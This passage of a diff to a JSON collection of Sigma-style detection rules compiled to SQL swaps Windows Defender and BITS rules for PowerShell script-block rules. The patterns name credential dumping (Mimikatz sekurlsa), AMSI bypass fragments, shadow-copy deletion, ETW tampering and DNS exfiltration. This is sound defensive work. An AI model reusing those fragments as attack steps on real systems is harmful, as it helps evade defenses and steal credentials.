Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" ], - "filename": "win_defender_suspicious_features_tampering.yml" + "filename": "posh_ps_clearing_windows_console_history.yml" }, { - "title": "Win Defender Restored Quarantine File", - "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "title": "Disable-WindowsOptionalFeature Command PowerShell", + "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", "status": "experimental", - "description": "Detects the restoration of files from the defender quarantine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Legitimate administrator activity restoring a file" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" ], - "filename": "win_defender_restored_quarantine_file.yml" + "filename": "posh_ps_disable_windows_optional_feature.yml" }, { - "title": "Windows Defender Exploit Guard Tamper", - "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", "status": "experimental", - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" ], - "filename": "win_defender_exploit_guard_tamper.yml" + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "LSASS Access Detected via Attack Surface Reduction", - "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", - "status": "experimental", - "description": "Detects Access to LSASS Process", - "author": "Markus Neis", + "title": "Powershell DNSExfiltration", + "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "status": "test", + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" ], - "filename": "win_defender_alert_lsass_access.yml" + "filename": "posh_ps_invoke_dnsexfiltration.yml" }, { - "title": "PSExec and WMI Process Creations Block", - "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", - "status": "test", - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "author": "Bhabesh Raj", + "title": "Execution via CL_Invocation.ps1 - Powershell", + "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", + "status": "experimental", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "win_defender_psexec_wmi_asr.yml" + "filename": "posh_ps_cl_invocation_lolscript.yml" }, { - "title": "Windows Defender AMSI Trigger Detected", - "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "status": "stable", - "description": "Detects triggering of AMSI by Windows Defender.", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation Via Use Clip - Powershell", + "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_defender_amsi_trigger.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Microsoft Defender Tamper Protection Trigger", - "id": "49e5bc24-8b86-49f1-b743-535f332c2856", - "status": "stable", - "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", - "author": "Bhabesh Raj, Nasreddine Bencherchali", + "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "status": "test", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Administrator might try to disable defender features during testing (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" ], - "filename": "win_defender_tamper_protection_trigger.yml" + "filename": "posh_ps_susp_win32_shadowcopy.yml" }, { - "title": "Windows Defender Threat Detection Disabled", - "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "status": "stable", - "description": "Detects disabling Windows Defender threat protection", - "author": "Ján Trenčanský, frack113", + "title": "Powershell Install a DLL in System Directory", + "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "status": "experimental", + "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1556.002" ], "falsepositives": [ - "Administrator actions (should be investigated)", - "Seen being triggered occasionally during Windows 8 Defender Updates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "win_defender_disabled.yml" + "filename": "posh_ps_copy_item_system_directory.yml" }, { - "title": "Windows Defender Threat Detected", - "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "status": "stable", - "description": "Detects all actions taken by Windows Defender malware detection engines", - "author": "Ján Trenčanský", + "title": "Disable of ETW Trace - Powershell", + "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "status": "experimental", + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "win_defender_threat.yml" + "filename": "posh_ps_etw_trace_evasion.yml" }, { - "title": "Important Scheduled Task Deleted", - "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "title": "Potential Invoke-Mimikatz PowerShell Script", + "id": "189e3b02-82b2-4b90-9662-411eb64486d4", "status": "experimental", - "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113", + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "author": "Tim Rauch", "tags": [ - "attack.impact", - "attack.t1489" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Mimikatz can be useful for testing the security of networks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_susp_schtasks_delete.yml" + "filename": "posh_ps_potential_invoke_mimikatz.yml" }, { - "title": "Suspicious Download with BITS from Direct IP", - "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a direct IP. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Live Memory Dump Using Powershell", + "id": "cd185561-4760-45d6-a63e-a51325112cae", + "status": "test", + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Diagnostics" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" ], - "filename": "win_bits_client_direct_ip_access.yml" + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" }, { - "title": "Suspicious Download with BITS from Suspicious TLD", - "id": "d635249d-86b5-4dad-a8c7-d7272b788586", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "title": "Code Executed Via Office Add-in XLL File", + "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", + "status": "test", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.t1197" + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_domain.yml" + "filename": "posh_ps_office_comobject_registerxll.yml" }, { - "title": "Download with BITS to Suspicious Folder", - "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "status": "test", + "description": "Detects Base64 encoded Shellcode", + "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.privilege_escalation", + "attack.t1055", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%\\%public\\%%' ESCAPE '\\' OR LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_local_folder.yml" + "filename": "posh_ps_shellcode_b64.yml" }, { - "title": "Unsigned Binary Loaded From Suspicious Location", - "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", - "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "status": "test", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "author": "Sami Ruohonen", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" + "filename": "posh_ps_ntfs_ads_access.yml" }, { - "title": "Microsoft Defender Blocked from Loading Unsigned DLL", - "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "title": "AMSI Bypass Pattern Assembly GetType", + "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" }, { - "title": "HybridConnectionManager Service Running", - "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "tags": [ - "attack.persistence", - "attack.t1554" + "title": "Suspicious PowerShell Mailbox Export to Share - PS", + "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.exfiltration" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE 